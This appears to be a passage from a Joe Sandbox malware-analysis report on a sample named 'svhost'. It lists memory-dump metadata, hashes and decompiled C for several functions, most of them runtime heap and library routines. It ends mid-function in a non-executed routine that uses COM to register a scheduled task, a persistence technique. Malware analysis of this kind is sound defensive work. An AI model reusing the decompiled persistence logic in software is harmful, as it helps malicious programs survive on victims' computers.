                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Exception@8LocimpLocimp::_Throwstd::bad_exception::bad_exceptionstd::locale::_task
                                      • String ID: bad locale name
                                      • API String ID: 3971965024-1405518554
                                      • Opcode ID: ace96de1e10e239dad896438d8bf640c754e8dea3b562b436f171719bd05fced
                                      • Instruction ID: c294ad7c84c9e22943c0e6de97d2b36adad5eae1baadc9bd02e2e0e064c37abb
                                      • Opcode Fuzzy Hash: ace96de1e10e239dad896438d8bf640c754e8dea3b562b436f171719bd05fced
                                      • Instruction Fuzzy Hash: 440140B6904608EBCB04EF94D851BDEB7B4FB18725F109669F8257B3C0DB316908CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E64440 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      C-Code - Quality: 73%
                                      			E00E64440(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				intOrPtr* _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr* _v56;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t81;
				void* _t92;
				intOrPtr _t95;
				void* _t117;
				intOrPtr* _t119;
				signed int _t161;
				void* _t166;
				void* _t168;
				signed int _t170;
				void* _t171;

				_push(0xffffffff);
				_push(0xec0f80);
				_push( *[fs:0x0]);
				_push(_t119);
				_push(_t117);
				_push(_t168);
				_push(_t166);
				_t81 =  *0xeef074; // 0x221cac15
				_push(_t81 ^ _t170);
				 *[fs:0x0] =  &_v16;
				_v20 = _t171 - 0x34;
				_v28 = _t119;
				_v48 = E00E56580(_v28);
				_v56 = _v28;
				_v36 = _v56;
				_v40 = _v56 + 4;
				asm("cdq");
				_v32 = (_a4 -  *_v36) / 0x18;
				asm("cdq");
				_v60 = ( *_v40 -  *_v36) / 0x18;
				_t92 = E00E651D0(_v28);
				_t176 = _v60 - _t92;
				if(_v60 == _t92) {
					E00E5BC70();
				}
				_v68 = _v60 + 1;
				_v52 = E00E65110(_v28, _v60 + 1, _t176, _v68);
				_t95 = E00E65210(_v48, _v52); // executed
				_v24 = _t95;
				_t39 = 0x18 + _v32 * 0x18; // 0x117
				_v64 = _v24 + _t39;
				_v44 = _v64;
				_v8 = 0;
				_v72 = E00E51650(_v32 * 0x18 + _v24);
				E00E64410(_a8, _v48, _v72, E00E51650(_a8));
				_v44 = _v32 * 0x18 + _v24;
				if(_a4 !=  *_v40) {
					E00E651A0(_t117, _v28, _t166, _t168, __eflags,  *_v36, _a4, _v24);
					_v44 = _v24;
					_t161 = _v32 * 0x18;
					__eflags = _t161;
					_t68 = _t161 + 0x18; // 0x117
					E00E651A0(_t117, _v28, _t166, _t168, _t161, _a4,  *_v40, _v24 + _t68);
				} else {
					E00E65170(_v28,  *_v36,  *_v40, _v24);
				}
				_v8 = 0xffffffff;
				E00E65070(_v28, _v24, _v68, _v52);
				 *[fs:0x0] = _v16;
				return _v32 * 0x18 + _v24;
			}

































                                      0x00e64443
                                      0x00e64445
                                      0x00e64450
                                      0x00e64451
                                      0x00e64455
                                      0x00e64456
                                      0x00e64457
                                      0x00e64458
                                      0x00e6445f
                                      0x00e64463
                                      0x00e64469
                                      0x00e6446c
                                      0x00e64477
                                      0x00e6447d
                                      0x00e64483
                                      0x00e6448c
                                      0x00e64499
                                      0x00e644a1
                                      0x00e644b0
                                      0x00e644b8
                                      0x00e644be
                                      0x00e644c3
                                      0x00e644c6
                                      0x00e644c8
                                      0x00e644c8
                                      0x00e644d3
                                      0x00e644e2
                                      0x00e644ec
                                      0x00e644f1
                                      0x00e644fb
                                      0x00e644ff
                                      0x00e64505
                                      0x00e64508
                                      0x00e6451f
                                      0x00e64537
                                      0x00e64546
                                      0x00e64551
                                      0x00e6457e
                                      0x00e64586
                                      0x00e64589
                                      0x00e64589
                                      0x00e64590
                                      0x00e645a2
                                      0x00e64553
                                      0x00e64566
                                      0x00e64566
                                      0x00e645d8
                                      0x00e645f7
                                      0x00e64606
                                      0x00e64614

                                      APIs
                                        • Part of subcall function 00E651D0: _Min_value.LIBCPMTD ref: 00E651FD
                                      • allocator.LIBCONCRTD ref: 00E644EC
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Min_valueallocator
                                      • String ID:
                                      • API String ID: 2162267568-0
                                      • Opcode ID: 39d18d36d12dcad7ef3e2a9381b062326ba9025c1eeffcdf089bb6dd5cc136ac
                                      • Instruction ID: 979179be999aaeafbe953bb72d5288921d7b718f5237b073623d650edc65c68e
                                      • Opcode Fuzzy Hash: 39d18d36d12dcad7ef3e2a9381b062326ba9025c1eeffcdf089bb6dd5cc136ac
                                      • Instruction Fuzzy Hash: A651C6B5E011099FCB08DF98E991AAEB7F5FF89340F105129E516B7391DA30A941CFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EADA7C Relevance: 1.6, APIs: 1, Instructions: 87COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 662 eada7c-eada91 663 eada9b-eadab6 662->663 664 eada93-eada96 662->664 666 eadb4f-eadb51 663->666 667 eadabc-eadabf 663->667 665 eadb52-eadb55 664->665 666->665 667->666 668 eadac5-eadac8 667->668 669 eadacb 668->669 670 eadace-eadad3 669->670 671 eadb29-eadb2c 670->671 672 eadad5-eadada 670->672 673 eadb3b-eadb4c 671->673 674 eadb2e-eadb3a call eb051f 671->674 672->670 675 eadadc-eadaf0 672->675 673->666 674->673 679 eadaf3-eadb18 675->679 680 eadb1a-eadb1d 679->680 681 eadb1f-eadb27 679->681 680->670 680->681 681->669
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: 5fd3ffb4337677bc49f9e788a487415ad42022b0d8fdbeb87e209f55cb08be17
                                      • Instruction ID: a5be9a76a5c509995f5cb9d7d6e221a25160c5fadb68a619e7cbaab8f0615bfa
                                      • Opcode Fuzzy Hash: 5fd3ffb4337677bc49f9e788a487415ad42022b0d8fdbeb87e209f55cb08be17
                                      • Instruction Fuzzy Hash: 76315C76A04614DF8B14DF59C8C485DB7F2FF8E32072686A5E516BB7A0C330AD05CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EAE032 Relevance: 1.5, APIs: 1, Instructions: 44COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 682 eae032-eae05c call eb04c2 call eb051f 687 eae098-eae09b 682->687 688 eae05e-eae093 call eadefd 682->688 688->687
                                      C-Code - Quality: 82%
                                      			E00EAE032(void* __ebx, intOrPtr* __ecx, void* __eflags) {
				void* _v5;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t16;
				void* _t17;
				char _t23;
				void* _t27;
				intOrPtr* _t32;
				intOrPtr _t33;

				_t32 = __ecx;
				_t16 = E00EB04C2(1, 0xb8);
				_t31 =  *_t32;
				_t33 = _t16;
				 *((intOrPtr*)( *_t32)) = _t33;
				_t17 = E00EB051F(0);
				_t37 = _t33;
				if(_t33 != 0) {
					_v36 =  *_t32;
					_v32 =  *((intOrPtr*)(_t32 + 4));
					_v28 =  *((intOrPtr*)(_t32 + 8));
					_v24 =  *((intOrPtr*)(_t32 + 0xc));
					_v20 =  *((intOrPtr*)(_t32 + 0x10));
					_t23 = 4;
					_v12 = _t23;
					_v16 = _t23;
					_push( &_v12);
					_push( &_v36);
					_push( &_v16); // executed
					_t27 = E00EADEFD(__ebx, _t31, _t32, _t33, _t37); // executed
					return _t27;
				}
				return _t17;
			}




















                                      0x00eae043
                                      0x00eae045
                                      0x00eae04a
                                      0x00eae04c
                                      0x00eae050
                                      0x00eae052
                                      0x00eae05a
                                      0x00eae05c
                                      0x00eae063
                                      0x00eae069
                                      0x00eae06f
                                      0x00eae075
                                      0x00eae07d
                                      0x00eae080
                                      0x00eae081
                                      0x00eae084
                                      0x00eae08a
                                      0x00eae08e
                                      0x00eae092
                                      0x00eae093
                                      0x00000000
                                      0x00eae093
                                      0x00eae09b

                                      APIs
                                        • Part of subcall function 00EB04C2: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00EB109F,00000001,00000364,00000006,000000FF,?,00000000,?,00EA5F5C,00EB059C), ref: 00EB0503
                                      • _free.LIBCMT ref: 00EAE052
                                        • Part of subcall function 00EB051F: HeapFree.KERNEL32(00000000,00000000,?,00EB7F92,?,00000000,?,?,?,00EB8235,?,00000007,?,?,00EB8728,?), ref: 00EB0535
                                        • Part of subcall function 00EB051F: GetLastError.KERNEL32(?,?,00EB7F92,?,00000000,?,?,?,00EB8235,?,00000007,?,?,00EB8728,?,?), ref: 00EB0547
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateErrorFreeLast_free
                                      • String ID:
                                      • API String ID: 314386986-0
                                      • Opcode ID: 801d678e76173649f3dd5ff748fecab96b591a1307d7242ff046506c322a9187
                                      • Instruction ID: b073038beeaa57dcd4862c77fd4f36c5a0543545bed89a24f228f29abad5af73
                                      • Opcode Fuzzy Hash: 801d678e76173649f3dd5ff748fecab96b591a1307d7242ff046506c322a9187
                                      • Instruction Fuzzy Hash: 03010CB6D00219AFCB50DFA9C841ADEBBF8FB48710F104526EA14EB340E770AA44CBD0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EB04C2 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 690 eb04c2-eb04cd 691 eb04db-eb04e1 690->691 692 eb04cf-eb04d9 690->692 694 eb04fa-eb050b RtlAllocateHeap 691->694 695 eb04e3-eb04e4 691->695 692->691 693 eb050f-eb051a call ea5f57 692->693 701 eb051c-eb051e 693->701 696 eb050d 694->696 697 eb04e6-eb04ed call eaf602 694->697 695->694 696->701 697->693 703 eb04ef-eb04f8 call ead114 697->703 703->693 703->694
                                      C-Code - Quality: 100%
                                      			E00EB04C2(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0xef3a68, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00EAF602();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00EA5F57(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E00EAD114(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}







                                      0x00eb04c8
                                      0x00eb04cd
                                      0x00eb04db
                                      0x00eb04db
                                      0x00eb04e1
                                      0x00eb04e3
                                      0x00eb04e3
                                      0x00eb04fa
                                      0x00eb0503
                                      0x00eb050b
                                      0x00000000
                                      0x00000000
                                      0x00eb04eb
                                      0x00eb04ed
                                      0x00eb050f
                                      0x00eb0514
                                      0x00eb051a
                                      0x00000000
                                      0x00eb051a
                                      0x00eb04f6
                                      0x00eb04f8
                                      0x00000000
                                      0x00000000
                                      0x00eb04f8
                                      0x00000000
                                      0x00eb04fa
                                      0x00eb04d3
                                      0x00eb04d9
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00EB109F,00000001,00000364,00000006,000000FF,?,00000000,?,00EA5F5C,00EB059C), ref: 00EB0503
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 7be7086d2a6d9dd7eb920ee66fdd29965463d7d0cbbf4d9709bdb6ce82673e1c
                                      • Instruction ID: 7280d8a6f63bc0c7bb9e93249a03488a6a081340a5d427119200536b4e72d20e
                                      • Opcode Fuzzy Hash: 7be7086d2a6d9dd7eb920ee66fdd29965463d7d0cbbf4d9709bdb6ce82673e1c
                                      • Instruction Fuzzy Hash: C2F0E9312465256BDB315B629C05EDF37889F817A0B14A061F919FB890DA30FD04CBE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EB0559 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 706 eb0559-eb0565 707 eb0597-eb05a2 call ea5f57 706->707 708 eb0567-eb0569 706->708 716 eb05a4-eb05a6 707->716 710 eb056b-eb056c 708->710 711 eb0582-eb0593 RtlAllocateHeap 708->711 710->711 712 eb056e-eb0575 call eaf602 711->712 713 eb0595 711->713 712->707 718 eb0577-eb0580 call ead114 712->718 713->716 718->707 718->711
                                      C-Code - Quality: 100%
                                      			E00EB0559(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00EA5F57(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0xef3a68, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00EAF602();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E00EAD114(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}





                                      0x00eb055f
                                      0x00eb0565
                                      0x00eb0597
                                      0x00eb059c
                                      0x00eb05a2
                                      0x00000000
                                      0x00eb05a2
                                      0x00eb0569
                                      0x00eb056b
                                      0x00eb056b
                                      0x00eb0582
                                      0x00eb058b
                                      0x00eb0593
                                      0x00000000
                                      0x00000000
                                      0x00eb0573
                                      0x00eb0575
                                      0x00000000
                                      0x00000000
                                      0x00eb057e
                                      0x00eb0580
                                      0x00000000
                                      0x00000000
                                      0x00eb0580
                                      0x00000000

                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,00000000,?,?,00E89C45,00000000,?,00E5166C,00000000,?,00E5B6DC,00000000), ref: 00EB058B
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: ce10f44c04375938c5af1090ce55108e93512b09565b1fdef7b78c7dcd4320e7
                                      • Instruction ID: fa0692eaab87e8593601129e132a61d13cb84bfbd15fea32427914a7d6bbe1fc
                                      • Opcode Fuzzy Hash: ce10f44c04375938c5af1090ce55108e93512b09565b1fdef7b78c7dcd4320e7
                                      • Instruction Fuzzy Hash: 6EE06571207715ABD63126A69C05BEF7A8C9F867A4F156121BC4AB6C91CB20FD40CAE1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 00E6F730 Relevance: 88.4, APIs: 49, Strings: 1, Instructions: 942COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 79%
                                      			E00E6F730(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				signed int _v20;
				char _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				void* _v88;
				void* _v92;
				signed int* _v96;
				signed int _v100;
				char _v101;
				signed int _v102;
				char _v103;
				signed int _v104;
				char _v105;
				char _v106;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				char _v113;
				char _v114;
				char _v115;
				char _v116;
				char _v117;
				char _v118;
				char _v119;
				char _v120;
				char _v121;
				char _v122;
				char _v123;
				void* _v128;
				intOrPtr _v132;
				void* _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				char _v300;
				char _v316;
				char _v332;
				char _v348;
				char _v364;
				char _v380;
				char _v396;
				char _v420;
				char _v444;
				char _v468;
				char _v492;
				signed int _t463;
				signed int _t464;
				signed int _t471;
				signed int _t472;
				intOrPtr* _t473;
				intOrPtr* _t474;
				intOrPtr* _t475;
				intOrPtr* _t476;
				intOrPtr* _t477;
				intOrPtr* _t478;
				intOrPtr* _t479;
				intOrPtr* _t480;
				signed int _t483;
				signed int _t491;
				signed int _t508;
				signed int _t514;
				signed int _t563;
				signed int _t582;
				intOrPtr* _t583;
				intOrPtr* _t585;
				intOrPtr* _t587;
				void* _t638;
				void* _t675;
				void* _t688;
				signed int _t701;
				signed int _t707;
				void* _t715;
				intOrPtr* _t845;
				intOrPtr* _t846;
				intOrPtr* _t847;
				signed int _t1034;
				void* _t1035;
				void* _t1036;
				intOrPtr* _t1037;
				intOrPtr* _t1038;
				intOrPtr* _t1039;
				intOrPtr* _t1040;
				void* _t1043;
				intOrPtr* _t1044;
				intOrPtr* _t1045;

				_t1033 = __esi;
				_t1032 = __edi;
				_t929 = __edx;
				_t732 = __ebx;
				_push(0xffffffff);
				_push(0xec1930);
				_push( *[fs:0x0]);
				_t1036 = _t1035 - 0x1dc;
				_t463 =  *0xeef074; // 0x221cac15
				_t464 = _t463 ^ _t1034;
				_v20 = _t464;
				_push(_t464);
				 *[fs:0x0] =  &_v16;
				_v132 = __ecx;
				if((E00E579A0(_a4) & 0x000000ff) == 0 && _a8 != 0) {
					E00E70340(__ebx, _v132, __edi, __esi, __eflags,  &_v44);
					_t471 = E00E579A0( &_v44);
					_t929 = _t471 & 0x000000ff;
					__eflags = _t471 & 0x000000ff;
					if((_t471 & 0x000000ff) == 0) {
						__imp__CoInitializeEx(0, 0);
						__eflags = _t471;
						if(_t471 >= 0) {
							__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 6, 3, 0, 0, 0);
							__eflags = _t471;
							if(_t471 >= 0) {
								_v56 = 0;
								_t472 =  &_v56;
								__imp__CoCreateInstance(0xec82ac, 0, 1, 0xec829c, _t472);
								__eflags = _t472;
								if(_t472 >= 0) {
									_t473 = E00E6F630( &_v348);
									_v188 =  *_t473;
									_v184 =  *((intOrPtr*)(_t473 + 4));
									_v180 =  *((intOrPtr*)(_t473 + 8));
									_v176 =  *((intOrPtr*)(_t473 + 0xc));
									_t474 = E00E6F630( &_v332);
									_v204 =  *_t474;
									_v200 =  *((intOrPtr*)(_t474 + 4));
									_v196 =  *((intOrPtr*)(_t474 + 8));
									_v192 =  *((intOrPtr*)(_t474 + 0xc));
									_t475 = E00E6F630( &_v316);
									_v220 =  *_t475;
									_v216 =  *((intOrPtr*)(_t475 + 4));
									_v212 =  *((intOrPtr*)(_t475 + 8));
									_v208 =  *((intOrPtr*)(_t475 + 0xc));
									_t476 = E00E6F630( &_v300);
									_v236 =  *_t476;
									_v232 =  *((intOrPtr*)(_t476 + 4));
									_v228 =  *((intOrPtr*)(_t476 + 8));
									_v224 =  *((intOrPtr*)(_t476 + 0xc));
									_t1037 = _t1036 - 0x10;
									_t477 = _t1037;
									 *_t477 = _v188;
									 *((intOrPtr*)(_t477 + 4)) = _v184;
									 *((intOrPtr*)(_t477 + 8)) = _v180;
									 *((intOrPtr*)(_t477 + 0xc)) = _v176;
									_t1038 = _t1037 - 0x10;
									_t478 = _t1038;
									 *_t478 = _v204;
									 *((intOrPtr*)(_t478 + 4)) = _v200;
									 *((intOrPtr*)(_t478 + 8)) = _v196;
									 *((intOrPtr*)(_t478 + 0xc)) = _v192;
									_t1039 = _t1038 - 0x10;
									_t479 = _t1039;
									 *_t479 = _v220;
									 *((intOrPtr*)(_t479 + 4)) = _v216;
									 *((intOrPtr*)(_t479 + 8)) = _v212;
									 *((intOrPtr*)(_t479 + 0xc)) = _v208;
									_t1040 = _t1039 - 0x10;
									_t480 = _t1040;
									 *_t480 = _v236;
									 *((intOrPtr*)(_t480 + 4)) = _v232;
									 *((intOrPtr*)(_t480 + 8)) = _v228;
									 *((intOrPtr*)(_t480 + 0xc)) = _v224;
									_t483 =  *((intOrPtr*)( *((intOrPtr*)( *_v56 + 0x28))))(_v56);
									__eflags = _t483;
									if(_t483 >= 0) {
										_v136 = 0;
									} else {
										_v136 = 1;
									}
									_v102 = _v136;
									E00E6F710( &_v300);
									E00E6F710( &_v316);
									E00E6F710( &_v332);
									E00E6F710( &_v348);
									__eflags = _v102 & 0x000000ff;
									if((_v102 & 0x000000ff) == 0) {
										_v52 = 0;
										_t491 =  *((intOrPtr*)( *((intOrPtr*)( *_v56 + 0x1c))))(_v56, E00E6F440(E00E6F380( &_v140, "\\")),  &_v52);
										__eflags = _t491;
										if(_t491 >= 0) {
											_v128 = 0;
										} else {
											_v128 = 1;
										}
										_v104 = _v128;
										E00E6F420( &_v140);
										__eflags = _v104 & 0x000000ff;
										if((_v104 & 0x000000ff) == 0) {
											 *((intOrPtr*)( *((intOrPtr*)( *_v52 + 0x3c))))(_v52, E00E6F440(E00E6F380( &_v144, E00E57A40())), 0);
											E00E6F420( &_v144);
											_v48 = 0;
											_v100 =  *((intOrPtr*)( *((intOrPtr*)( *_v56 + 0x24))))(_v56, 0,  &_v48);
											 *((intOrPtr*)( *((intOrPtr*)( *_v56 + 8))))(_v56);
											__eflags = _v100;
											if(_v100 >= 0) {
												_v88 = 0;
												_t508 =  *((intOrPtr*)( *((intOrPtr*)( *_v48 + 0x1c))))(_v48,  &_v88);
												__eflags = _t508;
												if(_t508 >= 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_v88 + 8))))(_v88);
													__eflags = _v100;
													if(_v100 >= 0) {
														_v64 = 0;
														_t514 =  *((intOrPtr*)( *((intOrPtr*)( *_v48 + 0x24))))(_v48,  &_v64);
														__eflags = _t514;
														if(_t514 >= 0) {
															_v68 = 0;
															_v100 =  *((intOrPtr*)( *((intOrPtr*)( *_v64 + 0x28))))(_v64, 2,  &_v68);
															 *((intOrPtr*)( *((intOrPtr*)( *_v64 + 8))))(_v64);
															__eflags = _v100;
															if(_v100 >= 0) {
																_v60 = 0;
																_v100 =  *((intOrPtr*)( *((intOrPtr*)( *_v68))))(_v68, 0xec828c,  &_v60);
																 *((intOrPtr*)( *((intOrPtr*)( *_v68 + 8))))(_v68);
																__eflags = _v100;
																if(_v100 >= 0) {
																	 *((intOrPtr*)( *((intOrPtr*)( *_v60 + 0x24))))(_v60, E00E6F440(E00E6F380( &_v148, L"Trigger1")));
																	E00E6F420( &_v148);
																	E00E70610(_t732, _v132, _t1032, _t1033,  &_v420, 1);
																	 *((intOrPtr*)( *((intOrPtr*)( *_v60 + 0x3c))))(_v60, E00E6F440(E00E6F380( &_v152, E00E57A40())));
																	E00E6F420( &_v152);
